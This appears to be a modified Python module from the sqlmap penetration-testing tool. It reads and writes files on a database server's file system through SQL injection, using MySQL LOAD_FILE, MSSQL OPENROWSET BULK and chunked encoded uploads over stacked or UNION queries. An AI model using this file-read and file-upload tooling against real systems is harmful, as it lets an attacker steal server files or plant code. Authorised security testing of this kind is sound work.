#!/usr/bin/env python
"""
2017-01-02 16:19:18 +03:00
Copyright ( c ) 2006 - 2017 sqlmap developers ( http : / / sqlmap . org / )
2017-10-11 15:50:46 +03:00
See the file ' LICENSE ' for copying permission
2008-10-15 19:38:22 +04:00
"""
import os
import sys
from lib . core . agent import agent
from lib . core . common import dataToOutFile
from lib . core . common import Backend
from lib . core . common import checkFile
from lib . core . common import decloakToTemp
from lib . core . common import decodeHexValue
from lib . core . common import getUnicode
from lib . core . common import isNumPosStrValue
from lib . core . common import isListLike
from lib . core . common import isStackingAvailable
from lib . core . common import isTechniqueAvailable
from lib . core . common import readInput
from lib . core . data import conf
from lib . core . data import kb
from lib . core . data import logger
from lib . core . enums import DBMS
from lib . core . enums import CHARSET_TYPE
from lib . core . enums import EXPECTED
from lib . core . enums import PAYLOAD
from lib . core . exception import SqlmapUndefinedMethod
from lib . core . settings import UNICODE_ENCODING
from lib . request import inject
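class Filesystem:
    """
    This class defines generic OS file system functionalities for plugins.

    Concrete DBMS plugins are expected to mix this class in and override the
    ``*ReadFile`` / ``*WriteFile`` stubs below. Several helpers used here
    (``checkDbmsOs``, ``cleanup``, ``createSupportTbl`` and the PostgreSQL
    ``oid`` attribute) are not defined in this class; they are assumed to be
    provided by the concrete plugin class (TODO(review): confirm).

    NOTE: the module targets Python 2 (``long``, ``xrange``, ``str.encode``
    with the ``hex``/``base64`` codecs).
    """

    def __init__(self):
        # Name of the support table and of its single column used to stage
        # file contents on the back-end DBMS.
        self.fileTblName = "sqlmapfile"
        self.tblField = "data"

    def _remoteFileLengthQuery(self, remoteFile, fileRead):
        """
        Build the DBMS-specific query that yields the byte length of
        ``remoteFile``, or return ``None`` when the current DBMS offers no
        way to measure it from here.

        On MSSQL the file is first copied into the support table and the
        returned query measures that staged copy (side effect: one stacked
        query is issued).
        """
        if Backend.isDbms(DBMS.MYSQL):
            return "LENGTH(LOAD_FILE('%s'))" % remoteFile

        if Backend.isDbms(DBMS.PGSQL) and not fileRead:
            # NOTE(review): self.oid (large object id of the written file) is
            # assumed to be set by the PostgreSQL plugin before this call.
            return "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid

        if Backend.isDbms(DBMS.MSSQL):
            self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)")
            inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField))
            return "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName)

        return None

    def _checkFileLength(self, localFile, remoteFile, fileRead=False):
        """
        Compare the size of ``localFile`` with the size of ``remoteFile`` on
        the back-end DBMS file system and log the outcome.

        Returns ``True`` when the sizes match (a PostgreSQL read, whose
        length cannot be checked, is also reported as ``True``), ``False``
        when they differ or the remote size could not be retrieved, and
        ``None`` when the current DBMS offers no length query at all.
        """
        lengthQuery = self._remoteFileLengthQuery(remoteFile, fileRead)

        try:
            localFileSize = os.path.getsize(localFile)
        except OSError:
            logger.warn("file '%s' is missing" % localFile)
            localFileSize = 0

        if fileRead and Backend.isDbms(DBMS.PGSQL):
            logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile)
            return True

        if lengthQuery is None:
            # Previously ``lengthQuery`` was left unbound on any DBMS other
            # than MySQL/PostgreSQL/MSSQL and the call below raised; report
            # the result as unknown instead.
            debugMsg = "length of the remote file '%s' cannot be " % remoteFile
            debugMsg += "checked on %s" % Backend.getDbms()
            logger.debug(debugMsg)
            return None

        logger.debug("checking the length of the remote file '%s'" % remoteFile)
        remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)

        if not isNumPosStrValue(remoteFileSize):
            warnMsg = "it looks like the file has not been written (usually "
            warnMsg += "occurs if the DBMS process user has no write "
            warnMsg += "privileges in the destination path)"
            logger.warn(warnMsg)
            return False

        remoteFileSize = long(remoteFileSize)
        # Decode the local path so it interpolates cleanly into the log line.
        localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
        sameFile = localFileSize == remoteFileSize

        if sameFile:
            infoMsg = "the local file '%s' and the remote file " % localFile
            infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize)
        elif remoteFileSize > localFileSize:
            infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize)
            infoMsg += "the local file '%s' (%d B)" % (localFile, localFileSize)
        else:
            infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize)
            infoMsg += "file '%s' (%d B)" % (localFile, localFileSize)

        logger.info(infoMsg)

        return sameFile

    def fileToSqlQueries(self, fcEncodedList):
        """
        Called by MySQL and PostgreSQL plugins to write a file on the
        back-end DBMS underlying file system.

        The first encoded chunk becomes an ``INSERT`` into the support table;
        every following chunk becomes an ``UPDATE`` that concatenates it onto
        the stored column. Returns the list of statements in order.
        """
        sqlQueries = []

        for index, fcEncodedLine in enumerate(fcEncodedList):
            if index == 0:
                sqlQueries.append("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, fcEncodedLine))
            else:
                updatedField = agent.simpleConcatenate(self.tblField, fcEncodedLine)
                sqlQueries.append("UPDATE %s SET %s=%s" % (self.fileTblName, self.tblField, updatedField))

        return sqlQueries

    def fileEncode(self, fileName, encoding, single, chunkSize=256):
        """
        Called by MySQL and PostgreSQL plugins to write a file on the
        back-end DBMS underlying file system.

        Reads ``fileName`` as binary (after ``checkFile`` validates it) and
        delegates to ``fileContentEncode``.
        """
        checkFile(fileName)

        with open(fileName, "rb") as f:
            content = f.read()

        return self.fileContentEncode(content, encoding, single, chunkSize)

    @staticmethod
    def _encodedLiteral(value, encoding):
        """
        Wrap an already-encoded chunk as a SQL literal: ``0x..`` for hex,
        a quoted string for base64, unchanged for any other encoding.
        """
        if encoding == "hex":
            return "0x%s" % value
        if encoding == "base64":
            return "'%s'" % value
        return value

    def fileContentEncode(self, content, encoding, single, chunkSize=256):
        """
        Encode ``content`` with ``encoding`` (a Python 2 codec name such as
        ``hex`` or ``base64``; falsy means no encoding) and return a list of
        SQL literals.

        With ``single`` false and content longer than ``chunkSize`` encoded
        characters, the result holds one literal per chunk; otherwise it is
        a single-element list holding the whole content.
        """
        retVal = []

        if encoding:
            # base64 output may contain line breaks; strip them so every
            # chunk is a single SQL token.
            content = content.encode(encoding).replace("\n", "")

        if not single and len(content) > chunkSize:
            for i in xrange(0, len(content), chunkSize):
                retVal.append(self._encodedLiteral(content[i:i + chunkSize], encoding))

        if not retVal:
            retVal = [self._encodedLiteral(content, encoding)]

        return retVal

    def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False):
        """
        Optionally verify that ``localFile`` was written as ``remoteFile``.

        Unless ``forceCheck`` is exactly ``True`` the user is prompted; when
        the check runs, returns ``_checkFileLength``'s result, otherwise
        ``True`` (no check requested).
        """
        choice = None

        if forceCheck is not True:
            message = "do you want confirmation that the local file '%s' " % localFile
            message += "has been successfully written on the back-end DBMS "
            message += "file system ('%s')? [Y/n] " % remoteFile
            choice = readInput(message, default='Y', boolean=True)

        if forceCheck or choice:
            return self._checkFileLength(localFile, remoteFile)

        return True

    def askCheckReadFile(self, localFile, remoteFile):
        """
        Prompt the user and, if confirmed, compare the downloaded
        ``localFile`` with ``remoteFile``. Returns ``_checkFileLength``'s
        result, or ``None`` when the user declines.
        """
        message = "do you want confirmation that the remote file '%s' " % remoteFile
        message += "has been successfully downloaded from the back-end "
        message += "DBMS file system? [Y/n] "

        if readInput(message, default='Y', boolean=True):
            return self._checkFileLength(localFile, remoteFile, True)

        return None

    @staticmethod
    def _undefinedMsg(methodName):
        """Error text for a plugin hook that the concrete plugin did not override."""
        errMsg = "'%s' method must be defined " % methodName
        errMsg += "into the specific DBMS plugin"
        return errMsg

    def nonStackedReadFile(self, remoteFile):
        """Plugin hook; must be overridden by the DBMS-specific plugin."""
        raise SqlmapUndefinedMethod(self._undefinedMsg("nonStackedReadFile"))

    def stackedReadFile(self, remoteFile):
        """Plugin hook; must be overridden by the DBMS-specific plugin."""
        raise SqlmapUndefinedMethod(self._undefinedMsg("stackedReadFile"))

    def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
        """Plugin hook; must be overridden by the DBMS-specific plugin."""
        raise SqlmapUndefinedMethod(self._undefinedMsg("unionWriteFile"))

    def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
        """Plugin hook; must be overridden by the DBMS-specific plugin."""
        raise SqlmapUndefinedMethod(self._undefinedMsg("stackedWriteFile"))

    @staticmethod
    def _joinChunks(fileContent):
        """
        Flatten a list-like read result into one string: nested list-likes
        contribute their first element (or nothing when empty), and falsy
        chunks are skipped.
        """
        pieces = []

        for chunk in fileContent:
            if isListLike(chunk):
                chunk = chunk[0] if len(chunk) > 0 else ""

            if chunk:
                pieces.append(chunk)

        return "".join(pieces)

    def readFile(self, remoteFiles):
        """
        Retrieve each comma-separated path in ``remoteFiles`` from the
        back-end DBMS file system and store it locally via ``dataToOutFile``.

        Returns the list of local paths written, each optionally suffixed
        with the outcome of the size check. ``kb.fileReadMode`` is set for
        the duration of each retrieval and always reset afterwards.
        """
        localFilePaths = []

        self.checkDbmsOs()

        for remoteFile in remoteFiles.split(','):
            fileContent = None
            kb.fileReadMode = True

            # ``finally`` guarantees the flag is cleared even when the plugin
            # hook raises; previously an exception left it set.
            try:
                if conf.direct or isStackingAvailable():
                    if isStackingAvailable():
                        debugMsg = "going to read the file with stacked query SQL "
                        debugMsg += "injection technique"
                        logger.debug(debugMsg)

                    fileContent = self.stackedReadFile(remoteFile)
                elif Backend.isDbms(DBMS.MYSQL):
                    debugMsg = "going to read the file with a non-stacked query "
                    debugMsg += "SQL injection technique"
                    logger.debug(debugMsg)

                    fileContent = self.nonStackedReadFile(remoteFile)
                else:
                    errMsg = "none of the SQL injection techniques detected can "
                    errMsg += "be used to read files from the underlying file "
                    errMsg += "system of the back-end %s server" % Backend.getDbms()
                    logger.error(errMsg)

                    fileContent = None
            finally:
                kb.fileReadMode = False

            if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL):
                self.cleanup(onlyFileTbl=True)
            elif isListLike(fileContent):
                fileContent = self._joinChunks(fileContent)

            if fileContent is not None:
                fileContent = decodeHexValue(fileContent, True)

                if fileContent:
                    localFilePath = dataToOutFile(remoteFile, fileContent)

                    if not Backend.isDbms(DBMS.PGSQL):
                        self.cleanup(onlyFileTbl=True)

                    sameFile = self.askCheckReadFile(localFilePath, remoteFile)

                    if sameFile is True:
                        localFilePath += " (same file)"
                    elif sameFile is False:
                        localFilePath += " (size differs from remote file)"

                    localFilePaths.append(localFilePath)
                else:
                    errMsg = "no data retrieved"
                    logger.error(errMsg)

        return localFilePaths

    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
        """
        Upload ``localFile`` to ``remoteFile`` on the back-end DBMS file
        system using whichever technique is available (stacked queries, or
        UNION on MySQL).

        Returns the plugin hook's result, or ``None`` when no usable
        technique was detected. A ``localFile`` ending in ``_`` is treated
        as a cloaked file and decloaked to a temporary path first.
        """
        written = False

        checkFile(localFile)
        self.checkDbmsOs()

        if localFile.endswith('_'):
            localFile = decloakToTemp(localFile)

        if conf.direct or isStackingAvailable():
            if isStackingAvailable():
                debugMsg = "going to upload the file '%s' with " % fileType
                debugMsg += "stacked query SQL injection technique"
                logger.debug(debugMsg)

            written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck)
            self.cleanup(onlyFileTbl=True)
        elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL):
            debugMsg = "going to upload the file '%s' with " % fileType
            debugMsg += "UNION query SQL injection technique"
            logger.debug(debugMsg)

            written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck)
        else:
            errMsg = "none of the SQL injection techniques detected can "
            errMsg += "be used to write files to the underlying file "
            errMsg += "system of the back-end %s server" % Backend.getDbms()
            logger.error(errMsg)

            return None

        return written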